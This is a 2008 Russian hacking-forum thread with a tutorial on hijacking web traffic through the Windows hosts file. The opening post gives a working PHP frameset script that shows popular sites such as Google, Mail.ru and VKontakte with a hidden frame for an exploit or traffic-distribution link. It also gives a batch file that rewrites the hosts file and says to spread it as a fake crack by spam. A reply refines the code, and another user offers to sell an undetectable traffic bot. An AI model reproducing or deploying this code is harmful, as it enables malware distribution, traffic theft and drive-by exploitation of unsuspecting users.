ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
сейчас доступен на antichat.xyz.
 |
25.08.2008, 11:08
|
|
Banned
Регистрация: 24.08.2008
Сообщений: 2
Провел на форуме:
46905
Репутация:
11
|
|
Сливаем траф через hosts
Сливаем траф через hosts
В данном топике я вам покажу еще один способ получить постоянный трафик.
Для реализации нам потребуеться хостинг с выделенным ip, либо дед с поднятым на нём денвером.
Обьясню попорядку. После заражения, когда жертва в очередной раз будет прописывать google.com она будет пободать не google.com, а наш сервер, но самое главное что она даже небудет об этом подозревать, так как будет открываться содержимое google.com, но помимо этого в фрейме будет выполняться наш скрипт!
Для чего это нужно вообще? Люди ежедневно посещают такие порталы как google.com mail.ru vkontakte.ru, итп; мы же будем извлекать из этого свою выгоду!
-----------------------------------------------------------
Для примера я буду использовать ip - 127.0.0.1, вы будете ставить вместо него ip своего сервака!
Итак первое на чем мы остановимся это PHP скрипт(index.php) каторый будет выполнять всю основную работу(редирект и отображение нашего скрипта в фрейме).
PHP код:
<?
if ($_SERVER['HTTP_HOST'] == "mail.ru")
{
echo("
<Frameset rows=',100%'>
<frame src='nash_script.php'>
<frame src='http://194.67.57.26'>
</frameset>
");
}
if ($_SERVER['HTTP_HOST'] == "rambler.ru")
{
echo("
<Frameset rows=',100%'>
<frame src='nash_script.php'>
<frame src='http://81.19.70.3'>
</frameset>
");
}
if ($_SERVER['HTTP_HOST'] == "www.mail.ru")
{
echo("
<Frameset rows=',100%'>
<frame src='nash_script.php'>
<frame src='http://194.67.57.26'>
</frameset>
");
}
if ($_SERVER['HTTP_HOST'] == "www.combats.ru")
{
echo("
<Frameset rows=',100%'>
<frame src='nash_script.php'>
<frame src='http://80.239.177.34'>
</frameset>
");
}
if ($_SERVER['HTTP_HOST'] == "combats.ru")
{
echo("
<Frameset rows=',100%'>
<frame src='nash_script.php'>
<frame src='http://80.239.177.34'>
</frameset>
");
}
if ($_SERVER['HTTP_HOST'] == "yandex.ru")
{
echo("
<Frameset rows=',100%'>
<frame src='nash_script.php'>
<frame src='http://www.yandex.ru'>
</frameset>
");
}
if ($_SERVER['HTTP_HOST'] == "ya.ru")
{
echo("
<Frameset rows=',100%'>
<frame src='nash_script.php'>
<frame src='http://www.ya.ru'>
</frameset>
");
}
if ($_SERVER['HTTP_HOST'] == "www.google.com")
{
echo("
<Frameset rows=',100%'>
<frame src='nash_script.php'>
<frame src='http://209.85.135.99'>
</frameset>
");
}
if ($_SERVER['HTTP_HOST'] == "google.com")
{
echo("
<Frameset rows=',100%'>
<frame src='nash_script.php'>
<frame src='http://209.85.135.99'>
</frameset>
");
}
if ($_SERVER['HTTP_HOST'] == "www.microsoft.com")
{
echo("
<Frameset rows=',100%'>
<frame src='nash_script.php'>
<frame src='http://207.46.19.190'>
</frameset>
");
}
if ($_SERVER['HTTP_HOST'] == "microsoft.com")
{
echo("
<Frameset rows=',100%'>
<frame src='nash_script.php'>
<frame src='http://207.46.19.190'>
</frameset>
");
}
if ($_SERVER['HTTP_HOST'] == "www.gmail.com")
{
echo("
<Frameset rows=',100%'>
<frame src='nash_script.php'>
<frame src='http://72.14.253.83'>
</frameset>
");
}
if ($_SERVER['HTTP_HOST'] == "gmail.com")
{
echo("
<Frameset rows=',100%'>
<frame src='nash_script.php'>
<frame src='http://72.14.253.83'>
</frameset>
");
}
if ($_SERVER['HTTP_HOST'] == "www.vkontakte.ru")
{
echo("
<Frameset rows=',100%'>
<frame src='nash_script.php'>
<frame src='http://195.190.105.240'>
</frameset>
");
}
if ($_SERVER['HTTP_HOST'] == "vkontakte.ru")
{
echo("
<Frameset rows=',100%'>
<frame src='nash_script.php'>
<frame src='http://195.190.105.240'>
</frameset>
");
}
if ($_SERVER['HTTP_HOST'] == "www.odnoklasniki.ru")
{
echo("
<Frameset rows=',100%'>
<frame src='nash_script.php'>
<frame src='http://81.177.141.207'>
</frameset>
");
}
if ($_SERVER['HTTP_HOST'] == "odnoklasniki.ru")
{
echo("
<Frameset rows=',100%'>
<frame src='nash_script.php'>
<frame src='http://81.177.141.207'>
</frameset>
");
}
?>
Где nash_script.php - страничка каторая будет открываться в невидимом фрейме, в нее Вы можете записать свой эксплоит или вставить ссылкус какойто партнерки, либо поставить ифрейм своей TDS, вобсчем это ваш трафф!
-----------------------------------------------------------
Теперь перейдем непосредсвенно к тому какже заставить компьютер обращаться к нашему серверу, для этого мы будем использовать .bat файл, каторый будет записовать в С:\Windows\system32\drivers\etc\hosts нужные нам строки.
Итак создаем bat файл с таким содержимым:
@echo off
echo 127.0.0.1 mail.ru >> C:\windows\system32\drivers\etc\hosts
echo 127.0.0.1 www.mail.ru >> C:\windows\system32\drivers\etc\hosts
echo 127.0.0.1 rambler.ru >> C:\windows\system32\drivers\etc\hosts
echo 127.0.0.1 www.combats.ru >> C:\windows\system32\drivers\etc\hosts
echo 127.0.0.1 combats.ru >> C:\windows\system32\drivers\etc\hosts
echo 127.0.0.1 yandex.ru >> C:\windows\system32\drivers\etc\hosts
echo 127.0.0.1 ya.ru >> C:\windows\system32\drivers\etc\hosts
echo 127.0.0.1 www.google.com >> C:\windows\system32\drivers\etc\hosts
echo 127.0.0.1 google.com >> C:\windows\system32\drivers\etc\hosts
echo 127.0.0.1 www.microsoft.com >> C:\windows\system32\drivers\etc\hosts
echo 127.0.0.1 microsoft.com >> C:\windows\system32\drivers\etc\hosts
echo 127.0.0.1 gamil.com >> C:\windows\system32\drivers\etc\hosts
echo 127.0.0.1 www.gmail.com >> C:\windows\system32\drivers\etc\hosts
echo 127.0.0.1 www.vkontakte.ru >> C:\windows\system32\drivers\etc\hosts
echo 127.0.0.1 vkontakte.ru >> C:\windows\system32\drivers\etc\hosts
echo 127.0.0.1 www.odnoklasniki.ru >> C:\windows\system32\drivers\etc\hosts
echo 127.0.0.1 odnoklasniki.ru >> C:\windows\system32\drivers\etc\hosts
Теперь идем в гугл и качаем прогу bat2exe и компилим наш батник в ексешку!
Все теперь распотраняем наш файл всеми известными способами, например спамом под видом крякере интерета.... Вобсчем это неважно. Главно что после того как люди запустят наш файл у себя на компе у нас появиться постоянный трафик каторым мы сможем свободно распоряжаться!
Зы. Особо не пинайте, так как тема топика давольно боянистая, но всеже такого я нечитал негде...... |
|
|
25.08.2008, 12:40
|
|
Banned
Регистрация: 11.10.2007
Сообщений: 54
Провел на форуме:
86268
Репутация:
84
|
|
Хорош.
127.0.0.1 это мой ip.
Не надо мне ничего слать.
Мне только недавно Винду установили.
За ваши дурацкие опыты, устал деньги насаживать за переустановку.
|
|
|
|
25.08.2008, 13:04
|
|
Познавший АНТИЧАТ
Регистрация: 01.06.2008
Сообщений: 1,047
Провел на форуме:
5321514
Репутация:
3313
|
|
лучше заменить
PHP код:
if ($_SERVER['HTTP_HOST'] == "combats.ru")
на
PHP код:
if(strstr($_SERVER['HTTP_HOST'], 'combats.ru')) // и т.д
|
|
|
|
25.08.2008, 13:48
|
|
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
Провел на форуме:
3025546
Репутация:
1327
|
|
много трафика с этого способа не получишь, если я правильно суть понял....
|
|
|
|
25.08.2008, 13:50
|
|
Banned
Регистрация: 21.08.2008
Сообщений: 16
Провел на форуме:
74225
Репутация:
33
|
|
аналогично распространению пинча.
|
|
|
|
25.08.2008, 16:47
|
|
Banned
Регистрация: 11.10.2007
Сообщений: 54
Провел на форуме:
86268
Репутация:
84
|
|
Автор статьи по всей видимости, не знаком с десктопным программированием.
В связи с этим я хочу сделать предложение автору, и всем заинтересованным лицам.
Я напишу бота который не будет определятся ничем.
Который будет лить трафик каждый раз, когда компьютер подключён к сети, а не когда пользователь лезет на яндекс.
Количество ссылок чтобы лить трафик неограниченно.
Всё просто вам надо создать файл типа:
www.site.org/tds.php
www.site1.org/tds.php
www.site2.org/tds.php
www.site3.org/tds.php
www.site4.org/tds.php
Закачать его на свой сайт, и боты будут автоматически и незаметно посещать эти сайты.
С вас сайт на платном хостинге для управления ботами, причём если вы знаете php давать мне доступ к ftp не надо, вам надо будет написать маленький скрипт для управления ботами, если вы не знаете то придётся предоставить мне доступ чтоб я мог загружать файл со списком сайтов.
Загрузки будем делать вместе.
Если вы не хотите со мной сотрудничать, то вы можете купить бота за очень очень скромную сумму.
Те кто заинтересован пишите в личные сообщения.
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
